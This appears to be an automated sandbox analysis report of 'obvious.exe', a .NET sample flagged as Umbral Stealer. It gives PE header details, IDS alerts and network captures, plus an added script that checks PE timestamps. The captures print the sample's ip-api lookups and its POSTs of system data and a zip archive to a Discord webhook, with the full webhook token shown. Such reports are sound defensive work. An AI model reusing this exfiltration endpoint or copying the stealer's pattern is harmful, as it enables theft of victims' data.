                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):6.052795731729376
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:obvious.exe
                            File size:235'008 bytes
                            MD5:eabe2a81aa3dabab25e49ee4b36ce075
                            SHA1:f55b6298f0a8330d90d39e20a73adb2e828dfd1c
                            SHA256:5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686
                            SHA512:9688119150d3a466d9a12bfc55933d367104747a2cf319467a78dfcf975361c9e2727f76efe380db9d0c92c39dc4b0241bfb444e965e92720c9edcf42c1d18fe
                            SSDEEP:6144:lloZM+rIkd8g+EtXHkv/iD4Wn0IZHMgPou35EwFyov28e1mpi:noZtL+EP8Wn0IZHMgPou35EwFm1
                            TLSH:A3345B1837B88F16E26F8BBDA5B0549F8771F103E94AF78E0C8895EC1411B42ED4AE57
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`................................
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x43aa8e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
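The COFF TimeDateStamp above (0x9C61056C, decoding to 19 February 2053) is what the "Binary contains a suspicious time stamp" signature refers to: the sample claims a build date about 29 years after it was analysed. The script below is an added example of that check, not code from the report. It constructs a minimal MZ/PE skeleton carrying the report's timestamp value (the skeleton is synthetic and is not obvious.exe), reads the stamp the way a PE parser would, and classifies it against the analysis time. One caveat a practitioner should keep in mind: .NET assemblies built with Roslyn's deterministic mode store a content hash in this field rather than a time, so a future date is suspicious but not by itself proof of tampering.

```python
"""Read a PE's COFF TimeDateStamp and flag builds dated after the analysis.

Added example, not part of the sandbox report. build_fake_pe() produces a
constructed header skeleton, not the real sample.
"""
import struct
from datetime import datetime, timezone
from typing import Tuple

# Report's analysis time (2024-08-27 20:06 CEST) expressed in UTC.
ANALYSIS_TIME = datetime(2024, 8, 27, 18, 6, tzinfo=timezone.utc)

# Value shown in the report for obvious.exe.
REPORTED_STAMP = 0x9C61056C


def build_fake_pe(timestamp: int, machine: int = 0x14C) -> bytes:
    """Constructed stub: DOS header with e_lfanew=0x80, then 'PE\\0\\0' + COFF header."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew -> PE signature offset
    # COFF: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    #       NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 3, timestamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


def pe_timestamp(data: bytes) -> int:
    """Return the COFF TimeDateStamp (seconds since 1970-01-01 UTC) from PE bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # TimeDateStamp sits 4 bytes into the COFF header, which follows the signature.
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def timestamp_verdict(stamp: int, analysed_at: datetime) -> Tuple[datetime, str]:
    """Classify the stamp relative to when the sample was observed."""
    built = datetime.fromtimestamp(stamp, tz=timezone.utc)
    if stamp == 0:
        return built, "zeroed"        # stripped or packer-reset
    if built > analysed_at:
        # Either forged, or a Roslyn deterministic build (hash, not a time).
        return built, "future"
    return built, "plausible"


if __name__ == "__main__":
    sample = build_fake_pe(REPORTED_STAMP)
    built, verdict = timestamp_verdict(pe_timestamp(sample), ANALYSIS_TIME)
    print(f"TimeDateStamp 0x{pe_timestamp(sample):08X} = {built:%Y-%m-%d %H:%M:%S} UTC -> {verdict}")
```

Feed `pe_timestamp()` the first few hundred bytes of a real file and compare the verdict with the IMAGE_DIRECTORY_ENTRY_DEBUG entry: a deterministic build also carries a reproducible-build debug record, whereas a forged stamp usually does not.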
Entrypoint instructions (0x43aa8e, .text):
jmp dword ptr [00402000h]    ; indirect jump through the single IAT slot (IAT at RVA 0x2000, imagebase 0x400000), i.e. mscoree.dll!_CorExeMain: the standard .NET loader stub
(The 97 instructions listed after it are all "add byte ptr [eax], al", the disassembly of the zero padding that follows the stub; the unconditional jmp means they are never reached.)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3aa3c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3c000          0x550         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x3e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3aa20          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x38a94       0x38c00   5e71e716964900fe90b93c660b996469  False     0.39885049559471364  data       6.068602053962369    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x3c000          0x550         0x600     962661cf515c57234d66775c661dfade  False     0.4134114583333333   data       4.575008625258809    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x3e000          0xc           0x200     7223f3255890538860641b7380927c24  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0x3c0a0  0x2c4  data                                                                                                  0.4449152542372881
RT_MANIFEST  0x3c364  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        Protocol  SID      Signature                                                     Severity  Source Port  Dest Port  Source IP    Dest IP
2024-08-27T20:06:02.729156+0200  TCP       2045593  ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)  1         49740        443        192.168.2.4  162.159.136.232
2024-08-27T20:05:38.509069+0200  TCP       2803305  ETPRO MALWARE Common Downloader Header Pattern H              3         49738        80         192.168.2.4  208.95.112.1
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Aug 27, 2024 20:05:04.582629919 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:05:04.590145111 CEST  80           49731      208.95.112.1     192.168.2.4
Aug 27, 2024 20:05:04.590285063 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:05:04.590452909 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:05:04.597310066 CEST  80           49731      208.95.112.1     192.168.2.4
Aug 27, 2024 20:05:05.090801001 CEST  80           49731      208.95.112.1     192.168.2.4
Aug 27, 2024 20:05:05.135689020 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:05:37.829689980 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:05:37.839713097 CEST  80           49738      208.95.112.1     192.168.2.4
Aug 27, 2024 20:05:37.840008974 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:05:37.840641975 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:05:37.848560095 CEST  80           49738      208.95.112.1     192.168.2.4
Aug 27, 2024 20:05:38.497677088 CEST  80           49738      208.95.112.1     192.168.2.4
Aug 27, 2024 20:05:38.509068966 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:05:38.519134045 CEST  80           49738      208.95.112.1     192.168.2.4
Aug 27, 2024 20:05:38.519201994 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:06:01.716226101 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:01.716267109 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:01.716362953 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:01.717652082 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:01.717660904 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.209083080 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.209160089 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.211054087 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.211060047 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.211299896 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.219053030 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.219280958 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:06:02.226526976 CEST  80           49731      208.95.112.1     192.168.2.4
Aug 27, 2024 20:06:02.226630926 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 27, 2024 20:06:02.264503956 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.346018076 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.401406050 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.428966045 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.428987026 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.729167938 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.729274988 CEST  443          49740      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.729327917 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.766123056 CEST  49740        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.774349928 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.774396896 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:02.774508953 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.774772882 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:02.774790049 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.249159098 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.250725985 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.250739098 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.387237072 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.387676001 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.387707949 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.387811899 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.387816906 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.387901068 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.387917995 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.387958050 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.387963057 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388017893 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388029099 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388081074 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388091087 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388163090 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388170004 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388221025 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388233900 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388278008 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388283968 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388343096 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388355017 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388377905 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388386965 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388431072 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388443947 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388492107 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388501883 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388537884 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388550997 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388583899 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388595104 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388642073 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388654947 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388688087 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388700962 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388744116 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388753891 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388794899 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388808966 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388849020 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388858080 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388897896 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388906002 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388962984 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388976097 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.388986111 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.388988972 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389005899 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389018059 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389070034 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389076948 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389110088 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389117002 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389157057 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389163971 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389215946 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389230013 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389261961 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389271975 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389303923 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389312983 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389359951 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389368057 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389422894 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389430046 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389462948 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389475107 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389523029 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389533997 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.389569044 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389626026 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389672041 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389708042 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.389764071 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.401184082 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.401742935 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.401772022 CEST  443          49741      162.159.136.232  192.168.2.4
Aug 27, 2024 20:06:03.401910067 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.401985884 CEST  49741        443        192.168.2.4      162.159.136.232
Aug 27, 2024 20:06:03.402070045 CEST  49741        443        192.168.2.4      162.159.136.232
                            Aug 27, 2024 20:06:03.402131081 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.402209044 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.406348944 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.406558990 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.406577110 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.406703949 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.415138960 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:04.230798960 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:04.230914116 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:04.230973005 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:04.231688976 CEST49741443192.168.2.4162.159.136.232
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Aug 27, 2024 20:05:04.573786020 CEST | 51802 | 53 | 192.168.2.4 | 1.1.1.1
                            Aug 27, 2024 20:05:04.581666946 CEST | 53 | 51802 | 1.1.1.1 | 192.168.2.4
                            Aug 27, 2024 20:05:37.804409027 CEST | 59969 | 53 | 192.168.2.4 | 1.1.1.1
                            Aug 27, 2024 20:05:37.827706099 CEST | 53 | 59969 | 1.1.1.1 | 192.168.2.4
                            Aug 27, 2024 20:06:01.708451986 CEST | 50698 | 53 | 192.168.2.4 | 1.1.1.1
                            Aug 27, 2024 20:06:01.715399981 CEST | 53 | 50698 | 1.1.1.1 | 192.168.2.4
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Aug 27, 2024 20:05:04.573786020 CEST | 192.168.2.4 | 1.1.1.1 | 0x5d54 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                            Aug 27, 2024 20:05:37.804409027 CEST | 192.168.2.4 | 1.1.1.1 | 0x3691 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                            Aug 27, 2024 20:06:01.708451986 CEST | 192.168.2.4 | 1.1.1.1 | 0x815d | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Aug 27, 2024 20:05:04.581666946 CEST | 1.1.1.1 | 192.168.2.4 | 0x5d54 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                            Aug 27, 2024 20:05:37.827706099 CEST | 1.1.1.1 | 192.168.2.4 | 0x3691 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                            Aug 27, 2024 20:06:01.715399981 CEST | 1.1.1.1 | 192.168.2.4 | 0x815d | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                            Aug 27, 2024 20:06:01.715399981 CEST | 1.1.1.1 | 192.168.2.4 | 0x815d | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
                            Aug 27, 2024 20:06:01.715399981 CEST | 1.1.1.1 | 192.168.2.4 | 0x815d | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                            Aug 27, 2024 20:06:01.715399981 CEST | 1.1.1.1 | 192.168.2.4 | 0x815d | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                            Aug 27, 2024 20:06:01.715399981 CEST | 1.1.1.1 | 192.168.2.4 | 0x815d | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                            • discord.com
                            • ip-api.com
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.4 | 49731 | 208.95.112.1 | 80 | 7532 | C:\Users\user\Desktop\obvious.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Aug 27, 2024 20:05:04.590452909 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                            Host: ip-api.com
                            Connection: Keep-Alive
                            Aug 27, 2024 20:05:05.090801001 CEST | 175 | IN | HTTP/1.1 200 OK
                            Date: Tue, 27 Aug 2024 18:05:04 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 6
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                            Data Raw: 66 61 6c 73 65 0a
                            Data Ascii: false


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.4 | 49738 | 208.95.112.1 | 80 | 7532 | C:\Users\user\Desktop\obvious.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Aug 27, 2024 20:05:37.840641975 CEST | 55 | OUT | GET /json/?fields=225545 HTTP/1.1
                            Host: ip-api.com
                            Aug 27, 2024 20:05:38.497677088 CEST | 379 | IN | HTTP/1.1 200 OK
                            Date: Tue, 27 Aug 2024 18:05:37 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 202
                            Access-Control-Allow-Origin: *
                            X-Ttl: 26
                            X-Rl: 43
                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.4 | 49740 | 162.159.136.232 | 443 | 7532 | C:\Users\user\Desktop\obvious.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-08-27 18:06:02 UTC | 360 | OUT | POST /api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX HTTP/1.1
                            Accept: application/json
                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                            Content-Type: application/json; charset=utf-8
                            Host: discord.com
                            Content-Length: 939
                            Expect: 100-continue
                            Connection: Keep-Alive
                            2024-08-27 18:06:02 UTC | 25 | IN | HTTP/1.1 100 Continue
                            2024-08-27 18:06:02 UTC | 939 | OUT | Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 927537\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0\r\nCPU: In
                            2024-08-27 18:06:02 UTC | 1369 | IN | HTTP/1.1 204 No Content
                            Date: Tue, 27 Aug 2024 18:06:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            set-cookie: __dcfduid=057e3318649f11efb66596921a33ad9f; Expires=Sun, 26-Aug-2029 18:06:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                            x-ratelimit-limit: 5
                            x-ratelimit-remaining: 4
                            x-ratelimit-reset: 1724781963
                            x-ratelimit-reset-after: 1
                            via: 1.1 google
                            alt-svc: h3=":443"; ma=86400
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fKE%2BTJUC2HKtH5YF04okCg7f5Z0gVfwtFx9viOWndncnjHYUI94sSnhFfI4m4%2BRliSvQZuuAKuTpw0Xu3gmPbGEd6R6u9vwLo8ns2nCAK8CtGCgfruUYopuLvcVt"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            X-Content-Type-Options: nosniff
                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                            Set-Cookie: __sdcfduid=057e3318649f11efb66596921a33ad9ff2c6a1766330374a53ed754cdc51d82f6f0a2d39c4c896c42ef89534fc2a0995; Expires=Sun, 26-Aug-2029 18:06:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                            Set-Cookie: __cfruid=23301c87e0e9c215d0688ab3be059f171b2b4c3a-1724781962; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                            Set-Cookie: _cfuvid=C1tkcOIqIO1SVMoPLpGdt7C2_yH4RA8SC0k.VKfqIgA-1724781962672-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                            Server: cloudflare
                            CF-RAY: 8b9dfe4058cc7cf4-EWR


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.4 | 49741 | 162.159.136.232 | 443 | 7532 | C:\Users\user\Desktop\obvious.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-08-27 18:06:03 UTC | 684 | OUT | POST /api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX HTTP/1.1
                            Accept: application/json
                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                            Content-Type: multipart/form-data; boundary="300b1d7c-ee42-44f9-b0e2-2c0d7366a2e3"
                            Host: discord.com
                            Cookie: __dcfduid=057e3318649f11efb66596921a33ad9f; __sdcfduid=057e3318649f11efb66596921a33ad9ff2c6a1766330374a53ed754cdc51d82f6f0a2d39c4c896c42ef89534fc2a0995; __cfruid=23301c87e0e9c215d0688ab3be059f171b2b4c3a-1724781962; _cfuvid=C1tkcOIqIO1SVMoPLpGdt7C2_yH4RA8SC0k.VKfqIgA-1724781962672-0.0.1.1-604800000
                            Content-Length: 674498
                            Expect: 100-continue
                            2024-08-27 18:06:03 UTC | 25 | IN | HTTP/1.1 100 Continue
                            2024-08-27 18:06:03 UTC | 40 | OUT | Data Ascii: --300b1d7c-ee42-44f9-b0e2-2c0d7366a2e3
                            2024-08-27 18:06:03 UTC | 140 | OUT | Data Ascii:
                            Content-Type: application/zip
                            Content-Disposition: form-data; name=file; filename=Umbral-927537.zip; filename*=utf-8''Umbral-927537.zip
